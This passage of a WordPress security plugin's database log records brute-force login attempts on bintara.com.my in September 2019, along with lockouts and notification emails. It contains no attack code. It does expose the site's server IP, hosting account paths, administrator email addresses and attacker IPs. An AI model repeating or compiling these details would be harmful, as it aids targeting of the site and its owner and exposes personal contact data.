Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKSHkXpgmG5P@iB8kXzAAAAJQ\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"5.135.183.49\";s:11:\"REMOTE_PORT\";s:5:\"51884\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKSHkXpgmG5P@iB8kXzAAAAJQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065544.6236\";s:12:\"REQUEST_TIME\";s:10:\"1569065544\";}}','notice','2019-09-21 11:32:26','2019-09-21 11:32:25',17799960,19290072,'https://bintara.com.my/blog/wp-login.php',1,0,'5.135.183.49'),(25626,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:31:37\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:31:37\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:46:37\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:46:37\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:31:38','2019-09-21 11:31:37',17881424,19287552,'https://bintara.com.my/wordpress/wp-login.php',1,0,'97.74.228.176'),(25627,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:31:38','2019-09-21 11:31:37',18087080,19287552,'https://bintara.com.my/wordpress/wp-login.php',1,0,'97.74.228.176'),(25628,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKN3kXpgmG5P@iB8kXswAAAJU\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"213.202.100.9\";s:11:\"REMOTE_PORT\";s:5:\"53830\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKN3kXpgmG5P@iB8kXswAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065527.9946\";s:12:\"REQUEST_TIME\";s:10:\"1569065527\";}}','notice','2019-09-21 11:32:09','2019-09-21 11:32:08',17799848,19289968,'https://bintara.com.my/2019/wp-login.php',1,0,'213.202.100.9'),(25624,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:31:21','2019-09-21 11:31:20',18089600,19289208,'https://bintara.com.my/wp/wp-login.php',1,0,'89.44.32.18'),(25625,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYKGHkXpgmG5P@iB8kXhQAAAIw\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"97.74.228.176\";s:11:\"REMOTE_PORT\";s:5:\"50497\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYKGHkXpgmG5P@iB8kXhQAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065496.8173\";s:12:\"REQUEST_TIME\";s:10:\"1569065496\";}}','notice','2019-09-21 11:31:38','2019-09-21 11:31:37',17796632,19287552,'https://bintara.com.my/wordpress/wp-login.php',1,0,'97.74.228.176'),(25623,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:31:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:31:20\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:46:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:46:20\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:31:21','2019-09-21 11:31:20',17883848,19289208,'https://bintara.com.my/wp/wp-login.php',1,0,'89.44.32.18'),(25470,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYEHHkXpgmG5P@iB8kRpwAAAJI\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"167.99.47.59\";s:11:\"REMOTE_PORT\";s:5:\"31439\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYEHHkXpgmG5P@iB8kRpwAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063966.5068\";s:12:\"REQUEST_TIME\";s:10:\"1569063966\";}}','notice','2019-09-21 11:06:08','2019-09-21 11:06:06',17798408,19287232,'https://bintara.com.my/wp/wp-login.php',1,0,'167.99.47.59'),(25471,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:06:06\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:06:06\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:21:06\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:21:06\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:06:08','2019-09-21 11:06:06',17882872,19287232,'https://bintara.com.my/wp/wp-login.php',1,0,'167.99.47.59'),(25472,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:06:08','2019-09-21 11:06:06',18089064,19287232,'https://bintara.com.my/wp/wp-login.php',1,0,'167.99.47.59'),(25473,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYEHHkXpgmG5P@iB8kRpgAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.9.122\";s:11:\"REMOTE_PORT\";s:5:\"62547\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYEHHkXpgmG5P@iB8kRpgAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063966.5069\";s:12:\"REQUEST_TIME\";s:10:\"1569063966\";}}','notice','2019-09-21 11:06:08','2019-09-21 11:06:06',17803608,19288792,'https://bintara.com.my/test/wp-login.php',1,0,'178.62.9.122'),(25474,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYEHHkXpgmG5P@iB8kRpgAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.9.122\";s:11:\"REMOTE_PORT\";s:5:\"62547\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYEHHkXpgmG5P@iB8kRpgAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063966.5069\";s:12:\"REQUEST_TIME\";s:10:\"1569063966\";}}','notice','2019-09-21 11:06:08','2019-09-21 11:06:06',17965680,19288792,'https://bintara.com.my/test/wp-login.php',1,0,'178.62.9.122'),(25475,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYEInkXpgmG5P@iB8kRqgAAAIU\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.9.122\";s:11:\"REMOTE_PORT\";s:5:\"63609\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYEInkXpgmG5P@iB8kRqgAAAIU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569063971.4449\";s:12:\"REQUEST_TIME\";s:10:\"1569063971\";}}','notice','2019-09-21 11:06:17','2019-09-21 11:06:15',18315544,19613520,'https://bintara.com.my/test/xmlrpc.php',1,0,'178.62.9.122'),(25476,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 